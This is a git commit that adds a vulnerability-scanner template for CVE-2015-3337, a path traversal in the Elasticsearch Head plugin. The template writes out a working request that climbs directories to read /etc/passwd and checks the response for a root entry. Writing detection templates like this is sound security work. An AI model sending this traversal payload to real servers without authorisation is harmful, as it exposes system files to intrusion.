Merge pull request #1143 from projectdiscovery/CVE-2015-3337

Added CVE-2015-3337
2021-03-25 02:22:45 +05:30 · 2021-03-25 02:22:45 +05:30 · c99ed9c24a
parent 50758eecf1 282dfa1c5c
commit c99ed9c24a
1 changed files with 25 additions and 0 deletions
--- a/cves/2015/CVE-2015-3337.yaml
+++ b/cves/2015/CVE-2015-3337.yaml
@ -0,0 +1,25 @@
+id: CVE-2015-3337
+
+info:
+ name: Elasticsearch Head plugin LFI
+ author: pdteam
+ severity: high
+ description: Directory traversal vulnerability in Elasticsearch before 1.4.5 and 1.5.x before 1.5.2, when a site plugin is enabled, allows remote attackers to read arbitrary files via unspecified vectors.
+ reference: https://nvd.nist.gov/vuln/detail/CVE-2015-3337
+ tags: cve,cve2015,elastic,lfi
+
+requests:
+ - method: GET
+   path:
+    - "{{BaseURL}}/_plugin/head/../../../../../../../../../../../../../../../../etc/passwd"
+
+   matchers-condition: and
+   matchers:
+    - type: regex
+      regex:
+       - "root:[x*]:0:0"
+      part: body
+
+    - type: status
+      status:
+       - 200